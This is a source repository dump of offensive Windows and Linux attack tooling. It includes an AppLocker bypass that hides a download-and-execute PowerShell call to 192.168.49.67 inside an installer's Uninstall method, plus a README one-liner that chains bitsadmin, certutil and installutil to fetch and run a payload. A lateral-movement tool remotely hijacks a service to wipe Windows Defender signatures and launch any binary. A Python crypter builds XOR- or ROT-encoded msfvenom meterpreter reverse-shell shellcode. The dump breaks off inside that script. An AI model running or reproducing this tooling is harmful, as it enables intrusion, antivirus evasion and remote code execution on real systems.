├── .gitignore
├── AppLocker Bypass PowerShell Runspace
├── App.config
├── AppLocker Bypass PowerShell Runspace.csproj
├── AppLocker Bypass PowerShell Runspace.sln
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
└── README.md
├── Fileless Lateral Movement
├── App.config
├── Fileless Lateral Movement.csproj
├── Fileless Lateral Movement.sln
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── Linux Shellcode Encoder
└── shellcodeCrypter.py
├── Linux Shellcode Loaders
├── sharedLibrary_LD_LIBRARY_PATH.c
├── sharedLibrary_LD_PRELOAD.c
├── simpleLoader.c
└── simpleXORencoder.c
├── MSSQL
├── App.config
├── MSSQL.csproj
├── MSSQL.sln
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── MiniDump
├── App.config
├── MiniDump.csproj
├── MiniDump.ps1
├── MiniDump.sln
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── PrintSpoofer.NET
├── App.config
├── PrintSpoofer.csproj
├── PrintSpoofer.sln
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── README.md
├── ROT Shellcode Encoder
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── ROT Shellcode Encoder.csproj
└── ROT Shellcode Encoder.sln
├── Sections Shellcode Process Injector
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Sections Shellcode Process Injector.csproj
└── Sections Shellcode Process Injector.sln
├── Shellcode Process Hollowing
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Shellcode Process Hollowing.csproj
└── Shellcode Process Hollowing.sln
├── Shellcode Process Injector
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Shellcode Process Injector.csproj
├── Shellcode Process Injector.ps1
└── Shellcode Process Injector.sln
├── Simple Shellcode Runner
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Simple Shellcode Runner.csproj
├── Simple Shellcode Runner.ps1
├── Simple Shellcode Runner.sln
└── Simple Shellcode Runner.vba
└── XOR Shellcode Encoder
├── App.config
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── XOR Shellcode Encoder.csproj
└── XOR Shellcode Encoder.sln
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.vspscc
94 | *.vssscc
95 | .builds
96 | *.pidb
97 | *.svclog
98 | *.scc
99 |
100 | # Chutzpah Test files
101 | _Chutzpah*
102 |
103 | # Visual C++ cache files
104 | ipch/
105 | *.aps
106 | *.ncb
107 | *.opendb
108 | *.opensdf
109 | *.sdf
110 | *.cachefile
111 | *.VC.db
112 | *.VC.VC.opendb
113 |
114 | # Visual Studio profiler
115 | *.psess
116 | *.vsp
117 | *.vspx
118 | *.sap
119 |
120 | # Visual Studio Trace Files
121 | *.e2e
122 |
123 | # TFS 2012 Local Workspace
124 | $tf/
125 |
126 | # Guidance Automation Toolkit
127 | *.gpState
128 |
129 | # ReSharper is a .NET coding add-in
130 | _ReSharper*/
131 | *.[Rr]e[Ss]harper
132 | *.DotSettings.user
133 |
134 | # TeamCity is a build add-in
135 | _TeamCity*
136 |
137 | # DotCover is a Code Coverage Tool
138 | *.dotCover
139 |
140 | # AxoCover is a Code Coverage Tool
141 | .axoCover/*
142 | !.axoCover/settings.json
143 |
144 | # Coverlet is a free, cross platform Code Coverage Tool
145 | coverage*.json
146 | coverage*.xml
147 | coverage*.info
148 |
149 | # Visual Studio code coverage results
150 | *.coverage
151 | *.coveragexml
152 |
153 | # NCrunch
154 | _NCrunch_*
155 | .*crunch*.local.xml
156 | nCrunchTemp_*
157 |
158 | # MightyMoose
159 | *.mm.*
160 | AutoTest.Net/
161 |
162 | # Web workbench (sass)
163 | .sass-cache/
164 |
165 | # Installshield output folder
166 | [Ee]xpress/
167 |
168 | # DocProject is a documentation generator add-in
169 | DocProject/buildhelp/
170 | DocProject/Help/*.HxT
171 | DocProject/Help/*.HxC
172 | DocProject/Help/*.hhc
173 | DocProject/Help/*.hhk
174 | DocProject/Help/*.hhp
175 | DocProject/Help/Html2
176 | DocProject/Help/html
177 |
178 | # Click-Once directory
179 | publish/
180 |
181 | # Publish Web Output
182 | *.[Pp]ublish.xml
183 | *.azurePubxml
184 | # Note: Comment the next line if you want to checkin your web deploy settings,
185 | # but database connection strings (with potential passwords) will be unencrypted
186 | *.pubxml
187 | *.publishproj
188 |
189 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
190 | # checkin your Azure Web App publish settings, but sensitive information contained
191 | # in these scripts will be unencrypted
192 | PublishScripts/
193 |
194 | # NuGet Packages
195 | *.nupkg
196 | # NuGet Symbol Packages
197 | *.snupkg
198 | # The packages folder can be ignored because of Package Restore
199 | **/[Pp]ackages/*
200 | # except build/, which is used as an MSBuild target.
201 | !**/[Pp]ackages/build/
202 | # Uncomment if necessary however generally it will be regenerated when needed
203 | #!**/[Pp]ackages/repositories.config
204 | # NuGet v3's project.json files produces more ignorable files
205 | *.nuget.props
206 | *.nuget.targets
207 |
208 | # Microsoft Azure Build Output
209 | csx/
210 | *.build.csdef
211 |
212 | # Microsoft Azure Emulator
213 | ecf/
214 | rcf/
215 |
216 | # Windows Store app package directories and files
217 | AppPackages/
218 | BundleArtifacts/
219 | Package.StoreAssociation.xml
220 | _pkginfo.txt
221 | *.appx
222 | *.appxbundle
223 | *.appxupload
224 |
225 | # Visual Studio cache files
226 | # files ending in .cache can be ignored
227 | *.[Cc]ache
228 | # but keep track of directories ending in .cache
229 | !?*.[Cc]ache/
230 |
231 | # Others
232 | ClientBin/
233 | ~$*
234 | *~
235 | *.dbmdl
236 | *.dbproj.schemaview
237 | *.jfm
238 | *.pfx
239 | *.publishsettings
240 | orleans.codegen.cs
241 |
242 | # Including strong name files can present a security risk
243 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
244 | #*.snk
245 |
246 | # Since there are multiple workflows, uncomment next line to ignore bower_components
247 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
248 | #bower_components/
249 |
250 | # RIA/Silverlight projects
251 | Generated_Code/
252 |
253 | # Backup & report files from converting an old project file
254 | # to a newer Visual Studio version. Backup files are not needed,
255 | # because we have git ;-)
256 | _UpgradeReport_Files/
257 | Backup*/
258 | UpgradeLog*.XML
259 | UpgradeLog*.htm
260 | ServiceFabricBackup/
261 | *.rptproj.bak
262 |
263 | # SQL Server files
264 | *.mdf
265 | *.ldf
266 | *.ndf
267 |
268 | # Business Intelligence projects
269 | *.rdl.data
270 | *.bim.layout
271 | *.bim_*.settings
272 | *.rptproj.rsuser
273 | *- [Bb]ackup.rdl
274 | *- [Bb]ackup ([0-9]).rdl
275 | *- [Bb]ackup ([0-9][0-9]).rdl
276 |
277 | # Microsoft Fakes
278 | FakesAssemblies/
279 |
280 | # GhostDoc plugin setting file
281 | *.GhostDoc.xml
282 |
283 | # Node.js Tools for Visual Studio
284 | .ntvs_analysis.dat
285 | node_modules/
286 |
287 | # Visual Studio 6 build log
288 | *.plg
289 |
290 | # Visual Studio 6 workspace options file
291 | *.opt
292 |
293 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
294 | *.vbw
295 |
296 | # Visual Studio LightSwitch build output
297 | **/*.HTMLClient/GeneratedArtifacts
298 | **/*.DesktopClient/GeneratedArtifacts
299 | **/*.DesktopClient/ModelManifest.xml
300 | **/*.Server/GeneratedArtifacts
301 | **/*.Server/ModelManifest.xml
302 | _Pvt_Extensions
303 |
304 | # Paket dependency manager
305 | .paket/paket.exe
306 | paket-files/
307 |
308 | # FAKE - F# Make
309 | .fake/
310 |
311 | # CodeRush personal settings
312 | .cr/personal
313 |
314 | # Python Tools for Visual Studio (PTVS)
315 | __pycache__/
316 | *.pyc
317 |
318 | # Cake - Uncomment if you are using it
319 | # tools/**
320 | # !tools/packages.config
321 |
322 | # Tabs Studio
323 | *.tss
324 |
325 | # Telerik's JustMock configuration file
326 | *.jmconfig
327 |
328 | # BizTalk build output
329 | *.btp.cs
330 | *.btm.cs
331 | *.odx.cs
332 | *.xsd.cs
333 |
334 | # OpenCover UI analysis results
335 | OpenCover/
336 |
337 | # Azure Stream Analytics local run output
338 | ASALocalRun/
339 |
340 | # MSBuild Binary and Structured Log
341 | *.binlog
342 |
343 | # NVidia Nsight GPU debugger configuration file
344 | *.nvuser
345 |
346 | # MFractors (Xamarin productivity tool) working folder
347 | .mfractor/
348 |
349 | # Local History for Visual Studio
350 | .localhistory/
351 |
352 | # BeatPulse healthcheck temp database
353 | healthchecksdb
354 |
355 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
356 | MigrationBackup/
357 |
358 | # Ionide (cross platform F# VS Code tools) working folder
359 | .ionide/
360 |
361 | # Fody - auto-generated XML schema
362 | FodyWeavers.xsd
363 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/AppLocker Bypass PowerShell Runspace.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}
8 | Exe
9 | AppLocker_Bypass_PowerShell_Runspace
10 | AppLocker Bypass PowerShell Runspace
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 | False
41 | ..\..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/AppLocker Bypass PowerShell Runspace.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AppLocker Bypass PowerShell Runspace", "AppLocker Bypass PowerShell Runspace.csproj", "{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {2EC8A5D7-7AA0-43D5-A631-D9AEC215E93F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Management.Automation;
3 | using System.Management.Automation.Runspaces;
4 | using System.Configuration.Install;
5 |
6 | namespace Bypass
7 | {
8 | class Program
9 | {
10 | static void Main(string[] args)
11 | {
12 | Console.WriteLine("Nothing going on in this binary.");
13 | }
14 | }
15 | [System.ComponentModel.RunInstaller(true)]
16 | public class Sample : Installer
17 | {
18 | public override void Uninstall(System.Collections.IDictionary savedState)
19 | {
20 | String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.67/run.txt') | iex";
21 | Runspace rs = RunspaceFactory.CreateRunspace();
22 | rs.Open();
23 | PowerShell ps = PowerShell.Create();
24 | ps.Runspace = rs;
25 | ps.AddScript(cmd);
26 | ps.Invoke();
27 | rs.Close();
28 | }
29 | }
30 | }
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("AppLocker Bypass PowerShell Runspace")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AppLocker Bypass PowerShell Runspace")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("94aedce4-d4a2-45db-b98e-860ee6be8385")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/README.md:
--------------------------------------------------------------------------------
1 | # AppLocker Bypass PowerShell Runspace
2 |
3 | We can encode this into a text file with `CertUtil`.
4 |
5 | ```powershell
6 | certutil -encode C:\Path\To\Binary.exe binary-coded.txt
7 | ```
8 |
9 | We then run the following oneliner on the target to use the combination of Microsoft-signed binaries to effectively bypass AppLocker.
10 |
11 | ```powershell
12 | cmd.exe /c del C:\Windows\Tasks\enc.txt && del c:\Windows\Tasks\a.exe && bitsadmin /Transfer theJob http://192.168.49.67/PSRunspace-InvokeRun-certutilCoded.txt C:\Windows\Tasks\enc.txt && certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\a.exe && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\a.exe
13 | ```
--------------------------------------------------------------------------------
/Fileless Lateral Movement/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Fileless Lateral Movement/Fileless Lateral Movement.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}
8 | Exe
9 | Fileless_Lateral_Movement
10 | Fileless Lateral Movement
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/Fileless Lateral Movement/Fileless Lateral Movement.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Fileless Lateral Movement", "Fileless Lateral Movement.csproj", "{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {005359DF-09A1-4FE2-8F0F-8F91C2BDE1DC}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Fileless Lateral Movement/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace PSLessExec
5 | {
6 | public class Program
7 | {
8 | public static uint SC_MANAGER_ALL_ACCESS = 0xF003F;
9 | public static uint SERVICE_ALL_ACCESS = 0xF01FF;
10 | public static uint SERVICE_DEMAND_START = 0x3;
11 | public static uint SERVICE_NO_CHANGE = 0xffffffff;
12 |
13 | [StructLayout(LayoutKind.Sequential)]
14 | public class QUERY_SERVICE_CONFIG
15 | {
16 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)]
17 | public UInt32 dwServiceType;
18 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)]
19 | public UInt32 dwStartType;
20 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)]
21 | public UInt32 dwErrorControl;
22 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
23 | public String lpBinaryPathName;
24 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
25 | public String lpLoadOrderGroup;
26 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)]
27 | public UInt32 dwTagID;
28 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
29 | public String lpDependencies;
30 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
31 | public String lpServiceStartName;
32 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
33 | public String lpDisplayName;
34 | };
35 |
36 | [DllImport("advapi32.dll", EntryPoint = "OpenSCManagerW", ExactSpelling = true, CharSet = CharSet.Unicode, SetLastError = true)]
37 | public static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwAccess);
38 |
39 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
40 | static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess);
41 |
42 | [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
43 | public static extern Boolean QueryServiceConfig(IntPtr hService, IntPtr intPtrQueryConfig, UInt32 cbBufSize, out UInt32 pcbBytesNeeded);
44 |
45 | [DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfig")]
46 | [return: MarshalAs(UnmanagedType.Bool)]
47 | public static extern bool ChangeServiceConfigA(IntPtr hService, uint dwServiceType, uint dwStartType, int dwErrorControl, string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId, string lpDependencies, string lpServiceStartName, string lpPassword, string lpDisplayName);
48 |
49 | [DllImport("advapi32", SetLastError = true)]
50 | [return: MarshalAs(UnmanagedType.Bool)]
51 | public static extern bool StartService(IntPtr hService, int dwNumServiceArgs, string[] lpServiceArgVectors);
52 |
53 | public static void Main(string[] args)
54 | {
55 | if (args.Length != 3)
56 | {
57 | Console.WriteLine("Usage: PSLessExec.exe [Target] [Service] [BinaryToRun]");
58 | Console.WriteLine("Example: PSLessExec.exe appsrv01 SensorService notepad.exe");
59 | return;
60 | }
61 |
62 | // Open remote SCManager
63 | IntPtr SCMHandle = OpenSCManager(args[0], null, SC_MANAGER_ALL_ACCESS);
64 | Console.WriteLine($"Got handle on SCManager on {args[0]}: {SCMHandle}.");
65 |
66 | // Access target service
67 | IntPtr schService = OpenService(SCMHandle, args[1], SERVICE_ALL_ACCESS);
68 | Console.WriteLine($"Got handle on target service {args[1]}: {schService}.");
69 |
70 | // Get current binPath (two passes, first is to determine the buffer size needed)
71 | UInt32 dwBytesNeeded;
72 | QUERY_SERVICE_CONFIG qsc = new QUERY_SERVICE_CONFIG();
73 | bool bResult = QueryServiceConfig(schService, IntPtr.Zero, 0, out dwBytesNeeded);
74 | IntPtr ptr = Marshal.AllocHGlobal((int)dwBytesNeeded);
75 | bResult = QueryServiceConfig(schService, ptr, dwBytesNeeded, out dwBytesNeeded);
76 | Marshal.PtrToStructure(ptr, qsc);
77 | String binPathOrig = qsc.lpBinaryPathName;
78 |
79 | // Pass 1: Disable Defender signatures
80 | String defBypass = "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All";
81 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, defBypass, null, null, null, null, null, null);
82 | Console.WriteLine($"Overwrote service executable to become '{defBypass}', result: {bResult}.");
83 |
84 | // Run the service for Pass 1
85 | bResult = StartService(schService, 0, null);
86 | Console.WriteLine("Launched service, defender signatures should be wiped.");
87 |
88 | // Pass 2: Run the chosen binary
89 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, args[2], null, null, null, null, null, null);
90 | Console.WriteLine($"Overwrote service executable to become '{args[2]}', result: {bResult}.");
91 |
92 | // Run the service for Pass 2
93 | bResult = StartService(schService, 0, null);
94 | Console.WriteLine("Launched service. Check for execution!");
95 |
96 | // Pass 3: Restore original binPath
97 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, binPathOrig, null, null, null, null, null, null);
98 | Console.WriteLine($"Restored service binary to '{binPathOrig}', result: {bResult}.");
99 | }
100 | }
101 | }
--------------------------------------------------------------------------------
/Fileless Lateral Movement/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Fileless Lateral Movement")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Fileless Lateral Movement")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("77f955c3-4910-49ea-9cd4-cbf5ad9c071a")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Linux Shellcode Encoder/shellcodeCrypter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Basic shellcode crypter for C# payloads
4 | # By Cas van Cooten
5 |
6 | import re
7 | import platform
8 | import argparse
9 | import subprocess
10 | from random import randint
11 |
12 | if platform.system() != "Linux":
13 | exit("[x] ERROR: Only Linux is supported for this utility script.")
14 |
15 | class bcolors:
16 | OKBLUE = '\033[94m'
17 | OKGREEN = '\033[92m'
18 | FAIL = '\033[91m'
19 | ENDC = '\033[0m'
20 | BOLD = '\033[1m'
21 |
22 | # Parse input arguments
23 | parser = argparse.ArgumentParser()
24 | parser.add_argument("lhost", help="listener IP to use")
25 | parser.add_argument("lport", help="listener port to use")
26 | parser.add_argument("type", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
27 | parser.add_argument("key", help="the key to encode the payload with (integer)", type=int, nargs='?', default=randint(1,255))
28 | parser.add_argument("payload", help="the payload type from msfvenom to generate shellcode for (default: windows/x64/meterpreter/reverse_tcp)", nargs='?', default="windows/x64/meterpreter/reverse_tcp")
29 | args = parser.parse_args()
30 |
31 | # Generate the shellcode given the preferred payload
32 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Generating payload {bcolors.OKGREEN}{args.payload}{bcolors.OKBLUE} for LHOST={bcolors.OKGREEN}{args.lhost}{bcolors.OKBLUE} and LPORT={bcolors.OKGREEN}{args.lport}{bcolors.ENDC}")
33 | result = subprocess.run(['msfvenom', '-p', args.payload, f"LHOST={args.lhost}", f"LPORT={args.lport}", 'exitfunc=thread', "-f", "csharp"], stdout=subprocess.PIPE)
34 |
35 | if result.returncode != 0:
36 | exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Msfvenom generation unsuccessful. Are you sure msfvenom is installed?{bcolors.ENDC}")
37 |
38 | # Get the payload bytes and split them
39 | payload = re.search(r"{([^}]+)}", result.stdout.decode("utf-8")).group(1).replace('\n', '').split(",")
40 |
41 | # Encode the payload with the chosen type and key
42 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.type}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
43 | for i, byte in enumerate(payload):
44 | byteInt = int(byte, 16)
45 |
46 | if args.type == "xor":
47 | byteInt = byteInt ^ args.key
48 | elif args.type == "rot":
49 | byteInt = byteInt + args.key & 255
50 | else:
51 | exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
52 |
53 | payload[i] = "{0:#0{1}x}".format(byteInt,4)
54 |
55 | # Format the output payload
56 | payLen = len(payload)
57 | payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL)
58 | payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
59 | payloadFormatted += f"// {args.type}-encoded with key {hex(args.key)}\n"
60 | payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{payload}\n}};"
61 | if payLen > 1000:
62 | f = open("/tmp/payload.txt", "w")
63 | f.write(payloadFormatted)
64 | f.close()
